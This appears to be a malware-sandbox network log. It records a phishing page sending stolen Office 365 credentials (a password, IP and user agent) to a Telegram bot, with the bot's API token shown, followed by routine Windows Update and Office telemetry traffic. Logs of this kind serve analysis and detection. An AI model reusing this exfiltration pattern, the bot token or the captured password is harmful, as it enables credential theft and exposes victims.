                                            Data Ascii: {"chat_id":5947339876,"text":"====== O365 Result ======\r\nEmail: \r\nPassword1: lj]q<bJT(ov!\r\nIP: https://ip-api.com/8.46.123.228\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
                                            2024-12-03 08:57:39 UTC388INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 03 Dec 2024 08:57:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 708
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-12-03 08:57:39 UTC708INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 36 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 38 35 31 38 36 30 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 77 69 7a 7a 7a 69 65 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 7a 7a 7a 69 65 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 34 37 33 33 39 38 37 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 2e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 57 69 7a 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 61 6d 6d 69 65 77 69 7a 7a 69 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 31 36 32 35 38 2c 22 74 65
                                            Data Ascii: {"ok":true,"result":{"message_id":9699,"from":{"id":6385186008,"is_bot":true,"first_name":"wizzzie_bot","username":"wizzzie_bot"},"chat":{"id":5947339876,"first_name":"S.","last_name":"Wiz","username":"sammiewizzie","type":"private"},"date":1733216258,"te


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.449765149.154.167.2204433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:40 UTC401OUTGET /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:40 UTC346INHTTP/1.1 400 Bad Request
                                            Server: nginx/1.18.0
                                            Date: Tue, 03 Dec 2024 08:57:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 80
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-12-03 08:57:40 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                            Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.44976620.12.23.50443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:44 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7ynDvC4mr7YoCCl&MD=csyhD7yf HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                            Host: slscr.update.microsoft.com
                                            2024-12-03 08:57:45 UTC560INHTTP/1.1 200 OK
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            Content-Type: application/octet-stream
                                            Expires: -1
                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                            MS-CorrelationId: 583d55c4-17a8-4e3d-906b-0fbc75e436a2
                                            MS-RequestId: a5a69318-fdb8-48ff-a28e-b22f6243e437
                                            MS-CV: MGwikO51xECx0ZX3.0
                                            X-Microsoft-SLSClientCache: 1440
                                            Content-Disposition: attachment; filename=environment.cab
                                            X-Content-Type-Options: nosniff
                                            Date: Tue, 03 Dec 2024 08:57:44 GMT
                                            Connection: close
                                            Content-Length: 30005
                                            2024-12-03 08:57:45 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                            2024-12-03 08:57:45 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20192.168.2.44976713.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:45 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:45 UTC471INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:45 GMT
                                            Content-Type: text/plain
                                            Content-Length: 218853
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public
                                            Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                            ETag: "0x8DD10CBC2E3B852"
                                            x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085745Z-174f7845968vqt9xhC1EWRgten00000015rg000000005kcq
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:45 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                            2024-12-03 08:57:46 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                            2024-12-03 08:57:46 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                            2024-12-03 08:57:46 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                            2024-12-03 08:57:46 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                            2024-12-03 08:57:46 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                            2024-12-03 08:57:46 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                            2024-12-03 08:57:46 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                            2024-12-03 08:57:46 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                            2024-12-03 08:57:46 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21192.168.2.44976913.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:48 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:48 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 450
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                            ETag: "0x8DC582BD4C869AE"
                                            x-ms-request-id: e0d2e361-601e-00ab-06d4-4366f4000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085748Z-174f7845968kvnqxhC1EWRmf3g0000000scg00000000autz
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:48 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22192.168.2.44977113.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:48 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:48 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 408
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                            ETag: "0x8DC582BB56D3AFB"
                                            x-ms-request-id: 2c78b3d6-001e-0017-21e0-430c3c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085748Z-174f7845968ljs8phC1EWRe6en00000015p0000000000kx5
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:48 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23192.168.2.44976813.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:48 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:48 UTC494INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 3788
                                            Connection: close
